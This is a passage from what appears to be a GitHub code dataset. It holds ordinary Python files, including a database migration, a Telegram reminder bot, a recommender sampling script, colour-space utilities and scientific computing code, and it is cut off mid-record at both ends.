parrot\nif letter in parrot:\n print(\"{} is in {}\".format(letter, parrot))\nelse:\n print(\"i dont need that letter\")\n\n# here is using not\n\n\nactivity = input(\"What would you like to do today \")\n\n# checking to see if cinema is in the activity variable. this is also case sensitive\nif \"cinema\" not in activity.casefold():\n print(\"But i want to go to the cinema\")\n","repo_name":"Philip-Loeffler/python","sub_path":"SectionFour/in&NotInConditions.py","file_name":"in&NotInConditions.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33044210483","text":"\"\"\"Redo migrations\n\nRevision ID: 10570f725f26\nRevises:\nCreate Date: 2023-05-22 00:30:36.417395\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\n\n# revision identifiers, used by Alembic.\nrevision = \"10570f725f26\"\ndown_revision = None\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade() -> None:\n # ### commands auto generated by Alembic - please adjust! 
###\n op.execute(sa.text('CREATE EXTENSION IF NOT EXISTS \"uuid-ossp\";'))\n op.create_table(\n \"ImageData\",\n sa.Column(\"data\", sa.LargeBinary(), nullable=False),\n sa.Column(\"id\", sa.UUID(), server_default=sa.text(\"uuid_generate_v4()\"), nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n sa.UniqueConstraint(\"id\"),\n )\n op.create_table(\n \"ScrapeData\",\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"barcode\", sa.String(length=255), nullable=False),\n sa.Column(\"url\", sa.String(length=512), nullable=False),\n sa.Column(\"html\", sa.Text(), nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_ScrapeData_barcode\"), \"ScrapeData\", [\"barcode\"], unique=False)\n op.create_table(\n \"ShoppingList\",\n sa.Column(\"owner_user_id\", sa.String(), nullable=False),\n sa.Column(\"list_title\", sa.String(length=255), nullable=False),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_ShoppingList_owner_user_id\"), \"ShoppingList\", [\"owner_user_id\"], unique=False)\n op.create_table(\n \"Product\",\n sa.Column(\"name\", sa.String(length=255), nullable=False),\n sa.Column(\"description\", sa.TEXT(), nullable=True),\n sa.Column(\"manufacturer\", sa.String(length=255), nullable=True),\n sa.Column(\"barcode\", sa.String(length=255), nullable=False),\n sa.Column(\"thumbnail_uuid\", sa.UUID(), nullable=True),\n sa.Column(\"barcode_image_uuid\", sa.UUID(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.ForeignKeyConstraint(\n [\"barcode_image_uuid\"],\n [\"ImageData.id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"thumbnail_uuid\"],\n [\"ImageData.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n op.create_index(op.f(\"ix_Product_barcode\"), \"Product\", [\"barcode\"], unique=True)\n op.create_table(\n \"ShoppingListItem\",\n sa.Column(\"name\", sa.String(length=255), nullable=False),\n sa.Column(\"list_id\", sa.Integer(), nullable=False),\n sa.Column(\"product_id\", sa.Integer(), nullable=True),\n sa.Column(\"id\", sa.Integer(), autoincrement=True, nullable=False),\n sa.Column(\"created_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.Column(\"updated_at\", sa.TIMESTAMP(timezone=True), server_default=sa.text(\"now()\"), nullable=False),\n sa.ForeignKeyConstraint(\n [\"list_id\"],\n [\"ShoppingList.id\"],\n ),\n sa.ForeignKeyConstraint(\n [\"product_id\"],\n [\"Product.id\"],\n ),\n sa.PrimaryKeyConstraint(\"id\"),\n )\n # ### end Alembic commands ###\n\n\ndef downgrade() -> None:\n # ### commands 
auto generated by Alembic - please adjust! ###\n op.drop_table(\"ShoppingListItem\")\n op.drop_index(op.f(\"ix_Product_barcode\"), table_name=\"Product\")\n op.drop_table(\"Product\")\n op.drop_index(op.f(\"ix_ShoppingList_owner_user_id\"), table_name=\"ShoppingList\")\n op.drop_table(\"ShoppingList\")\n op.drop_index(op.f(\"ix_ScrapeData_barcode\"), table_name=\"ScrapeData\")\n op.drop_table(\"ScrapeData\")\n op.drop_table(\"ImageData\")\n op.execute(sa.text('DROP EXTENSION IF EXISTS \"uuid-ossp\";'))\n # ### end Alembic commands ###\n","repo_name":"Mewelopers/barcode-api","sub_path":"alembic/versions/10570f725f26_redo_migrations.py","file_name":"10570f725f26_redo_migrations.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6889585443","text":"import os\nimport pandas as pd\n\nmerged_cooccur_csv = os.path.join(\n os.getcwd(),\n 'symlinks/exp/multi_sense_cooccur/cooccurrences/merged_cooccur.csv')\n\nprint('Reading csv ...')\ndf = pd.read_csv(merged_cooccur_csv)\n\ndef show_labels():\n labels = ['row_id'] + df.columns.values.tolist()\n print('Column labels: ',labels)\n\ndef usage():\n label_str = \"- To access column names call 'show_labels()'\"\n example_str = \"- Run the following to get co-occurrences for 'leaf' sorted by 'obj_attr': \\n\\tcooccur('leaf','obj_attr') \\n\\t\\tOR\\n\\tdf[df.word1=='leaf'].sort_values(by='obj_attr')\"\n ref_str = \"- Refer to https://pandas.pydata.org/ for more ways of interacting with dataframe 'df'\"\n usage_str = \"- To see usage instructions again call 'usage()'\"\n print('')\n print('-'*100)\n print('Usage:')\n print(label_str)\n print(example_str)\n print(ref_str)\n print(usage_str)\n print('-'*100)\n print('')\n\ndef cooccur(word1,sort_by):\n print(df[df.word1==word1].sort_values(by=sort_by))\n show_labels()\n\nshow_labels()\nusage()\n\nimport pdb; pdb.set_trace()","repo_name":"BigRedT/vico","sub_path":"exp/multi_sense_cooccur/explore_merged_cooccur.py","file_name":"explore_merged_cooccur.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"21"} +{"seq_id":"31685459287","text":"import numpy as np\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import pyplot as plt\nimport pandas as pd\nfrom scipy.optimize import curve_fit\nfrom Ex2_RK4_variables import T, t_A\nimport h5py\n\ncol_name = ['dt', 'slope', 'intercept']\ndata = [\n pd.read_csv('global_ERR', delimiter=' ', names=col_name)\n]\n\ntitle_prop = {'fontsize': 16}\ntext_prop = {'fontsize': 14}\n\n'''4th power fit'''\nfig = plt.figure(dpi=150)\nROI = (data[0]['dt'] < 0.5)\n\nfor i, datum in enumerate(data):\n plt.plot(datum['dt'][ROI], datum['slope'][ROI], 'bo', label='observation')\n\ndt_list = np.linspace(0,0.5,100)\n\nfunc = lambda x, a: a*x**4\ncurve_fit_res = curve_fit(func, data[0]['dt'][ROI], data[0]['slope'][ROI], p0=[1e-4])\nprint(curve_fit_res)\nplt.plot(dt_list, func(dt_list, *curve_fit_res[0]), 'r--', label=r'$(\\Delta t)^4$ fitting')\n\nplt.xlabel(r'$\\Delta t$ (atomic unit)', text_prop)\nplt.ylabel('slope (fitting result)', text_prop)\n# plt.title('relative global error / T', title_prop)\nplt.title('relative global error / T, close-up', title_prop)\n\nplt.legend()\nplt.tight_layout()\n# plt.savefig('rel_global_error.png')\nplt.savefig('rel_global_error_close-up.png')\n\n'''plot typical data and linear fitting of slopes'''\n\nfileName = 'ERR.h5'\nf = h5py.File(fileName, 'r')\ndata = 
[]\ndata_dt = []\ndata_fit = []\nfor name in f.keys():\n data.append(f[name][:])\n data_dt.append(f[name].attrs['dt'])\n data_fit.append(f[name].attrs['fit'])\nf.close()\n\n\ntitle_prop = {'fontsize': 16}\ntext_prop = {'fontsize': 14}\n\nfig_ERR = plt.figure(dpi=150)\n\nfor i, datum in enumerate(data[:6]):\n t_axis = np.linspace(0, T-data_dt[i], datum.size)\n plt.plot(t_axis, np.poly1d(data_fit[i])(t_axis), 'k--', )\n plt.plot(t_axis, datum, label=r'$\\Delta$t=' + f'{data_dt[i]}')\n\nplt.xlabel(f'time (a.u.) = ({round(t_A, 3)} fs)', text_prop)\nplt.ylabel('relative deviation from exact sol.', text_prop)\nplt.title('error accumulation rate', title_prop)\nplt.legend()\nplt.savefig('RK_slope_fit_typical.png')\n","repo_name":"irimmal/noise-spectrometry","sub_path":"RK4_example/error_plot.py","file_name":"error_plot.py","file_ext":"py","file_size_in_byte":1974,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16193278535","text":"#import packages\nimport numpy as np\nimport random\nfrom collections import Counter\nimport os\nimport pandas as pd\nfrom pathlib import Path\nimport random\nimport pandas as pd\nfrom pathlib import Path\n\n# Sets up variables\nword_list = []\nindex_keep = {}\nresults = set()\nkey={'nyt_headlines.csv':-1,'foxnews_headlines.csv':2,'washingtonpost_headlines.csv':-1,'csmonitor_headlines.csv':0,'nypost_headlines.csv':1,'cnn_headlines.csv':-2}\n\n#initializing path names\n# main directory\ndir = Path(__file__).parents[1]\n\n# get path to raw_data folder\ndata = str(dir) + \"/data/data_collection/raw_data\"\n\n# get path to tdms folder\ntdm_path= str(dir) + \"/data/data_collection/processed_data/term_matrices\"\n\ndef join(X):\n tf_idf=[]\n # print(\"test join()\")\n c=0\n for matrix in X:\n # print(\"changed matrix\")\n c+=1\n for row in matrix:\n # print(\"-------------------\")\n # print(len(row))\n tf_idf.append(row)\n # print(len(tf_idf))\n # print(\"end\")\n # print(f\"c={c}\")\n return tf_idf\n\ndef count(title, query):\n c = 0\n for word in title:\n if (str(query).lower().strip() in str(word).lower().strip()):\n c = c + 1\n return c\n\ndef raw_data_compress(num_samples):\n results=set()\n # reads raw_data files\n for filename in os.listdir(data):\n file_path = data+\"/\"+filename\n data_rows = pd.read_csv(file_path, on_bad_lines='skip')\n # filtering data for number of samples wanted wanted\n # handling if the number of samples wanted is more than the file contains.\n # saving \n if num_samples<=len(data_rows):\n index_keep[filename] = random.sample(range(len(data_rows)),num_samples)\n else:\n index_keep[filename] = range(len(data_rows))\n \n data_compressed = data_rows.iloc[index_keep[filename], 1]\n # data_compressed = data_compressed.iloc[:, 1]\n for row in data_compressed:\n results.update(str(row).lower().split(\"\\n\")[0].strip().split(\" \"))\n return results\n\n#generating the term document matrix\ndef term_matrix(samples=100, test_headline: str=None):\n term_document_matrices=[]\n y=[]\n results=raw_data_compress(samples)\n results = list(results)\n # print(os.listdir(data)) \n for filename in os.listdir(data):\n file_path = \"/\".join([data,filename])\n data_rows=pd.read_csv(file_path, on_bad_lines='skip')\n rows_compressed = data_rows.iloc[index_keep[filename],:]\n rows_compressed = rows_compressed.iloc[:, 1]\n \n term_document_matrix = []\n for title in rows_compressed:\n title = str(title).strip().split(\" \")\n for t in title:\n t=t.strip()\n array = np.zeros(len(results))\n for word in 
set(title):\n idf=np.log(len(rows_compressed)/count(rows_compressed,word))\n array[results.index(str(word).lower().strip())] = idf*count(title, str(word).lower()) / len(title)\n \n # print(len(array))\n term_document_matrix.append(array)\n # print(type(list(term_document_matrix))) \n term_document_matrices.append(term_document_matrix)\n y.append(list([key[filename]]*len(rows_compressed)))\n # print(type(term_document_matrices))\n # print(join(term_document_matrices))\n # print(np.array(join(term_document_matrices)).shape)\n # print(len(term_document_matrices))\n return np.array(join(term_document_matrices)),np.array(np.ravel(y))\n\nif __name__==\"__main__\":\n term_matrix()","repo_name":"heliosraz/NewsHeadlinePolitics","sub_path":"src/term_doc.py","file_name":"term_doc.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"7486829917","text":"from aiogram import types\nfrom aiogram.dispatcher import FSMContext\nimport keyboard as kb\nfrom create_bot import bot\nimport asyncio\nfrom database import sqlite_db as sql\nfrom rbot_handlers.states import FSMAdmin\n\n\nasync def command_start(message):\n try:\n await bot.send_message(message.from_user.id, f\"Рад тебя видеть, {message.from_user.first_name}!\",\n reply_markup=kb.keyboard)\n await message.delete()\n except:\n await message.reply(r\"Чтобы общаться с ботом, напиши ему в ЛС https://t.me/oh_my_reminder_bot\")\n\n\nasync def command_create(message):\n await FSMAdmin.text.set()\n await message.answer(\"О чем напомнить?\")\n\n\nasync def set_text(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['text'] = message.text\n await FSMAdmin.next()\n await message.answer('Когда напомнить? 
(время в формате HH:MM)')\n\n\nasync def set_date(message: types.Message, state: FSMContext):\n async with state.proxy() as data:\n data['date'] = message.text\n await sql.add_reminder(\n dict(user_id=message.from_user.id,\n text=data['text'],\n time=data['date']))\n # await message.answer()\n await state.finish()\n\n\nasync def check_tasks():\n for task in await sql.select_reminder():\n await bot.send_message(task[\"user_id\"], task['time'])\n await sql.delete_reminder(task[\"id\"])\n\n\ndef repeat_check_tasks(loop):\n asyncio.ensure_future(check_tasks(), loop=loop)\n loop.call_later(2, repeat_check_tasks, loop)\n\n\nasync def cancel(message: types.Message, state: FSMContext):\n current_state = await state.get_state()\n if current_state is None:\n return\n await state.finish()\n await message.answer('Добавление записи отменено')\n\n\n","repo_name":"ProYulia/reminder_bot_v2.0","sub_path":"rbot_handlers/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8021050379","text":"from fenics import (\n Function,\n FunctionSpace,\n project,\n DirichletBC,\n Constant,\n TrialFunction,\n split,\n TestFunction,\n solve,\n assemble,\n Expression,\n assign,\n action,\n derivative,\n NonlinearVariationalProblem,\n NonlinearVariationalSolver,\n info,\n det,\n inv,\n dot,\n)\nfrom spaces import Space\nfrom parameters import Parameters\nfrom time_structure import MacroTimeStep\nfrom initial import Initial\nfrom forms import deformation_gradient, sigma_fluid\n\n# Define a function solving a problem on a subdomain\ndef solve_fluid(\n velocity_fluid: Initial,\n displacement_fluid: Initial,\n pressure_fluid: Initial,\n velocity_solid: Initial,\n displacement_solid: Initial,\n fluid: Space,\n solid: Space,\n first_time_step,\n param: Parameters,\n macrotimestep_fluid: MacroTimeStep,\n macrotimestep_solid: MacroTimeStep,\n adjoint,\n save=False,\n):\n\n # Store old solutions\n velocity_fluid_old = Function(fluid.function_space_split[0])\n displacement_fluid_old = Function(fluid.function_space_split[1])\n pressure_fluid_old = Function(fluid.function_space_split[2])\n velocity_fluid_old.assign(velocity_fluid.old)\n displacement_fluid_old.assign(displacement_fluid.old)\n pressure_fluid_old.assign(pressure_fluid.old)\n\n # Store old interface values\n velocity_old_interface = Function(solid.function_space_split[0])\n displacement_old_interface = Function(solid.function_space_split[1])\n velocity_old_interface.assign(velocity_solid.old_average)\n displacement_old_interface.assign(displacement_solid.old_average)\n\n # Initialize new interface values\n velocity_interface = Function(solid.function_space_split[0])\n displacement_interface = Function(solid.function_space_split[1])\n\n # Define time pointers\n if adjoint:\n\n microtimestep = macrotimestep_fluid.tail.before\n\n else:\n\n microtimestep = macrotimestep_fluid.head\n\n # Compute macro time-step size\n size = macrotimestep_fluid.size - 1\n for m in range(size):\n\n # Initialize average values\n velocity_fluid_average_temp = Function(fluid.function_space_split[0])\n displacement_fluid_average_temp = Function(\n fluid.function_space_split[1]\n )\n pressure_fluid_average_temp = Function(fluid.function_space_split[2])\n velocity_fluid_average = Function(fluid.function_space_split[0])\n displacement_fluid_average = Function(fluid.function_space_split[1])\n pressure_fluid_average = Function(fluid.function_space_split[2])\n\n # 
Extrapolate weak boundary conditions on the interface\n if adjoint:\n\n extrapolation_proportion = (\n microtimestep.point - macrotimestep_fluid.head.point\n ) / macrotimestep_fluid.dt\n time_step_size = microtimestep.dt\n microtimestep_form = microtimestep.after\n microtimestep_form_before = microtimestep\n if m == 0 and macrotimestep_fluid.after is None:\n time_step_size_old = microtimestep.dt\n microtimestep_form_after = microtimestep_form\n elif m == 0:\n time_step_size_old = (\n macrotimestep_fluid.microtimestep_after.before.dt\n )\n microtimestep_form_after = (\n macrotimestep_fluid.microtimestep_after\n )\n else:\n time_step_size_old = microtimestep.after.dt\n microtimestep_form_after = microtimestep_form.after\n\n else:\n\n extrapolation_proportion = (\n macrotimestep_fluid.tail.point - microtimestep.after.point\n ) / macrotimestep_fluid.dt\n time_step_size = microtimestep.dt\n time_step_size_old = microtimestep.dt\n microtimestep_form_before = None\n microtimestep_form = None\n microtimestep_form_after = None\n\n # Define intermediate solutions\n velocity_interface.assign(\n project(\n extrapolation_proportion * velocity_solid.old\n + (1.0 - extrapolation_proportion) * velocity_solid.new,\n solid.function_space_split[0],\n )\n )\n displacement_interface.assign(\n project(\n extrapolation_proportion * displacement_solid.old\n + (1.0 - extrapolation_proportion) * displacement_solid.new,\n solid.function_space_split[1],\n )\n )\n\n # Define trial and test functions\n trial_function = TrialFunction(fluid.function_space)\n (\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n ) = split(trial_function)\n test_function = TestFunction(fluid.function_space)\n (\n first_test_function,\n second_test_function,\n third_test_function,\n ) = split(test_function)\n\n # Define scheme\n time = microtimestep.after.point\n time_before = microtimestep.point\n initial = False\n if not adjoint:\n bilinear_form = fluid.primal_problem.bilinear_form\n functional = fluid.primal_problem.functional\n else:\n bilinear_form = fluid.adjoint_problem.bilinear_form\n functional = fluid.adjoint_problem.functional\n if first_time_step and m == 0:\n initial = True\n left_hand_side = bilinear_form(\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n first_test_function,\n second_test_function,\n third_test_function,\n velocity_fluid_old,\n displacement_fluid_old,\n pressure_fluid_old,\n fluid,\n param,\n time_step_size,\n microtimestep_form_before,\n microtimestep_form,\n )\n right_hand_side = functional(\n velocity_fluid_old,\n displacement_fluid_old,\n pressure_fluid_old,\n velocity_interface,\n displacement_interface,\n velocity_old_interface,\n displacement_old_interface,\n first_test_function,\n second_test_function,\n third_test_function,\n fluid,\n solid,\n param,\n time,\n time_before,\n time_step_size,\n time_step_size_old,\n microtimestep_form_before,\n microtimestep_form,\n microtimestep_form_after,\n initial,\n )\n right_hand_side_assemble = assemble(right_hand_side)\n\n # Solve problem\n time = microtimestep.after.point\n if adjoint:\n left_hand_side_assemble = assemble(left_hand_side)\n trial_function = Function(fluid.function_space)\n [\n boundary.apply(\n left_hand_side_assemble, right_hand_side_assemble\n )\n for boundary in fluid.boundaries(time, param, adjoint)\n ]\n solve(\n left_hand_side_assemble,\n trial_function.vector(),\n right_hand_side_assemble,\n )\n (\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n ) = 
trial_function.split(trial_function)\n else:\n trial_function_new = Function(fluid.function_space)\n form = left_hand_side - right_hand_side\n form = action(form, trial_function_new)\n jacobian = derivative(form, trial_function_new, trial_function)\n boundaries = fluid.boundaries(time, param, adjoint)\n problem = NonlinearVariationalProblem(\n form, trial_function_new, boundaries, jacobian\n )\n solver = NonlinearVariationalSolver(problem)\n # prm = solver.parameters\n # info(prm, True)\n solver.parameters[\"newton_solver\"][\"report\"] = False\n # solver.parameters[\"newton_solver\"][\"maximum_iterations\"] = 100\n solver.solve()\n (\n velocity_fluid_new,\n displacement_fluid_new,\n pressure_fluid_new,\n ) = trial_function_new.split(trial_function)\n\n # Save solutions\n if save:\n velocity_fluid.save(velocity_fluid_new)\n displacement_fluid.save(displacement_fluid_new)\n pressure_fluid.save(pressure_fluid_new)\n\n # Update average values\n velocity_fluid_average_temp.assign(velocity_fluid_average)\n displacement_fluid_average_temp.assign(displacement_fluid_average)\n pressure_fluid_average_temp.assign(pressure_fluid_average)\n # velocity_fluid_average.assign(project(velocity_fluid_average_temp\n # + 0.5 * time_step_size / macrotimestep_fluid.dt\n # * (velocity_fluid_old + velocity_fluid_new),\n # fluid.function_space_split[0]))\n # displacement_fluid_average.assign(project(displacement_fluid_average_temp\n # + 0.5 * time_step_size / macrotimestep_fluid.dt\n # * (displacement_fluid_old + displacement_fluid_new),\n # fluid.function_space_split[1]))\n # pressure_fluid_average.assign(project(pressure_fluid_average_temp + time_step_size / macrotimestep_fluid.dt * pressure_fluid_new,\n # fluid.function_space_split[2]))\n velocity_fluid_average.assign(velocity_fluid_new)\n displacement_fluid_average.assign(displacement_fluid_new)\n pressure_fluid_average.assign(pressure_fluid_new)\n\n # Update solution\n velocity_fluid_old.assign(velocity_fluid_new)\n displacement_fluid_old.assign(displacement_fluid_new)\n pressure_fluid_old.assign(pressure_fluid_new)\n\n # Update boundary conditions\n velocity_old_interface.assign(velocity_interface)\n displacement_old_interface.assign(displacement_interface)\n\n # Advance timeline\n if adjoint:\n\n microtimestep = microtimestep.before\n\n else:\n\n microtimestep = microtimestep.after\n\n # Save final values\n # velocity_fluid_average.assign(velocity_fluid_new)\n # displacement_fluid_average.assign(displacement_fluid_new)\n # pressure_fluid_average.assign(pressure_fluid_new)\n\n velocity_fluid.new.assign(velocity_fluid_new)\n displacement_fluid.new.assign(displacement_fluid_new)\n pressure_fluid.new.assign(pressure_fluid_new)\n velocity_fluid.new_average.assign(velocity_fluid_average)\n displacement_fluid.new_average.assign(displacement_fluid_average)\n pressure_fluid.new_average.assign(pressure_fluid_average)\n\n return\n","repo_name":"MSoszynska/FSI","sub_path":"solve_fluid.py","file_name":"solve_fluid.py","file_ext":"py","file_size_in_byte":11042,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"2458671159","text":"# set the environment path to find Recommenders\nimport sys\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import minmax_scale\nfrom sklearn.model_selection import train_test_split\n\nfrom reco_utils.common.python_utils import binarize\nfrom reco_utils.common.timer import Timer\nfrom reco_utils.dataset import movielens\nfrom reco_utils.dataset.python_splitters 
import python_stratified_split\nfrom reco_utils.evaluation.python_evaluation import (\n map_at_k,\n ndcg_at_k,\n precision_at_k,\n recall_at_k,\n rmse,\n mae,\n logloss,\n rsquared,\n exp_var\n)\nfrom reco_utils.recommender.sar import SAR\nimport os\nfrom tqdm import tqdm\nimport argparse\n\nfrom util_sample import split_by_user, train_model, sampling, predict, save_aggregation, save_test, load_data_after_split, save_data_after_split\nfrom util_sample import preprocess_args\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset',default='100k')\n parser.add_argument('--s',type=int,default=300)\n parser.add_argument('--N_prime',type=int,default=1)\n parser.add_argument('--T',type=int,default=100000)\n parser.add_argument('--Alg',type=str,default='ir')\n parser.add_argument('--series',type=int,default=1)\n args = preprocess_args(parser.parse_args())\n\n # Select MovieLens data size: 100k, 1m, 10m, or 20m\n MOVIELENS_DATA_SIZE = args.dataset\n\n data = movielens.load_pandas_df(\n size=MOVIELENS_DATA_SIZE\n )\n\n # Convert the float precision to 32-bit in order to reduce memory consumption\n data['rating'] = data['rating'].astype(np.float32)\n\n s = args.s\n k = args.k\n T = args.T\n series = args.series\n\n user_num = 0\n item_num = 0\n\n if MOVIELENS_DATA_SIZE == '1m':\n user_num = 6040\n item_num = 3952\n elif MOVIELENS_DATA_SIZE == '100k':\n user_num = 943\n item_num = 1682\n else:\n raise ValueError\n\n data_after_split = split_by_user(data, \"userID\", user_num, args.Alg)\n print(\"Complete splitting the dataset. \")\n\n frequency_aggregation = [{} for i in range(user_num)]\n\n for i in tqdm(range(T)):\n # randomly sample s users and get the train set and test set\n train_set, test_set = sampling(data_after_split, user_num, s)\n model = train_model(args.Alg, train_set)\n top_k = predict(model, test_set, train_set, k, args.Alg, user_num)\n\n # store the recommended items into frequency_aggregation\n for j in range(len(top_k)):\n # remember user position = user id - 1\n current_user = top_k['userID'][j]\n current_item = top_k['itemID'][j]\n if current_item in frequency_aggregation[current_user - 1]:\n frequency_aggregation[current_user - 1][current_item] += 1\n else:\n frequency_aggregation[current_user - 1][current_item] = 1\n\n test = data_after_split[0]['test']\n for i in tqdm(range(1, user_num)):\n test = test.append(data_after_split[i]['test'], ignore_index=True)\n\n directory = './data/' + args.dataset\n if not os.path.exists(directory):\n os.makedirs(directory)\n directory += '/' + MOVIELENS_DATA_SIZE + '_' + str(s) + '_' + str(k) + '_' + str(T) + '_' + args.Alg + '_' + 'default'\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n test_name = directory + '/test_' + str(series) + '.csv'\n save_test(test, test_name)\n\n aggregation_name = directory + '/frequency_aggregation_' + str(series) + '.txt'\n save_aggregation(frequency_aggregation, aggregation_name)\n\n print('Complete')\n","repo_name":"liu00222/PORE-Provably-Robust-Recommender-Systems-against-Data-Poisoning-Attacks","sub_path":"sample_T.py","file_name":"sample_T.py","file_ext":"py","file_size_in_byte":3604,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"10862782696","text":"import numpy\nimport skimage\nfrom PIL import Image\nfrom matplotlib import pyplot\nfrom skimage.color import lab2rgb, rgb2lab\n\n\ndef create_image_by_lab(lightness, a, b) -> Image:\n \"\"\"\n Create a 500x500 RGB image by L*a*b* or 
CIELAB color space values\n\n :param lightness: L* indicates lightness with 0 as black and 100 as white\n :param a: a* color value where -128 is green and +128 is red\n :param b: b* color value where -128 is blue and +128 is yellow\n :return: RGB Image\n \"\"\"\n lab_array = numpy.zeros((500, 500, 3))\n lab_array[:, :, 0] = lightness\n lab_array[:, :, 1] = a\n lab_array[:, :, 2] = b\n\n rgb_array_float = lab2rgb(lab_array)\n rgb_array_uint8 = skimage.img_as_ubyte(rgb_array_float)\n\n return Image.fromarray(rgb_array_uint8, mode=\"RGB\")\n\n\ndef create_image_by_rgb(red, green, blue) -> Image:\n \"\"\"\n Create a 500x500 RGB image by red, green and blue values\n\n :param red: red value between 0 and 255\n :param green: green value between 0 and 255\n :param blue: blue value between 0 and 255\n :return: RGB Image\n \"\"\"\n rgb_array = numpy.zeros((500, 500, 3), dtype=numpy.uint8)\n rgb_array[:, :, 0] = red\n rgb_array[:, :, 1] = green\n rgb_array[:, :, 2] = blue\n return Image.fromarray(rgb_array, mode=\"RGB\")\n\n\ndef convert_lab_array_to_rgb(array: numpy.ndarray) -> numpy.ndarray:\n rgb_array_float = lab2rgb(array)\n rgb_array_uint8 = skimage.img_as_ubyte(rgb_array_float)\n return rgb_array_uint8\n\n\ndef convert_rgb_array_to_lab(array: numpy.ndarray) -> numpy.ndarray:\n return rgb2lab(array)\n\n\ndef show_image(image, title=None):\n pyplot.imshow(image)\n pyplot.axis(\"off\")\n if title:\n pyplot.title(title)\n pyplot.show()\n","repo_name":"ptrstn/colorspaces","sub_path":"colorspaces/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":1719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30195223581","text":"#!/usr/local/bin/python3\n\nimport pandas as pd\nfrom dataclasses import dataclass\nimport argparse\nimport math\n#from os.path import exists\n\n@dataclass\nclass SequenceRange:\n \"\"\"Class for the start and end of a range.\"\"\"\n name: str\n transcript: str\n start: int\n end: int\n chrom: str\n total_cn: int\n def overlaps(self, other: \"SequenceRange\") -> bool:\n if self.chrom != other.chrom:\n return False\n return (other.start <= self.start <= other.end) or (other.start <= self.end <= other.end) or (self.start <= other.start <= self.end) or (self.start <= other.end <= self.end)\n\nmy_parser = argparse.ArgumentParser(description='find the missing data in cnv files')\nmy_parser.add_argument('-sample',\n type=str,\n help='sample')\nmy_parser.add_argument('-ploidy',\n type=float,\n help='ploidy')\nmy_parser.add_argument('-gene_df',\n type=str,\n help='path to the df of genes and cooridnates of canonical transcript')\nmy_parser.add_argument('-somatic_cnv_vcf',\n type=str,\n help='path to the mtr input cnv of the sample')\n####data input\n\nargs = my_parser.parse_args()\nsample = args.sample\nploidy = args.ploidy\ngene_df_path = args.gene_df\ncnv_path = args.somatic_cnv_vcf\n \n \namps = list()\nmissing_gene_data_sample= list()\nmissing_data_genes_next_to_amps = list()\ngene_df = pd.read_csv(gene_df_path) \n#gene_df=gene_df.dropna()\n\n#set threshold for amplifications\nif ploidy <2.5:\n amp_threshold = 5\nelif ploidy >= 2.5:\n amp_threshold = 9\n\n \n#file_exists = exists(cnv_path):\ntry: \n cnv = pd.read_csv(cnv_path, '\\t')\n cnv['total_cn'] = cnv['major_cn'] + cnv['minor_cn']\n total_cn = list(cnv['total_cn'])\n cnv['id'] = cnv['seqnames'].astype(str) + '_' + cnv['start'].astype(str) + '_' + cnv['end'].astype(str) + '_' + cnv['total_cn'].astype(str) +'_' + sample\n id_list = list(cnv['id'])\n for 
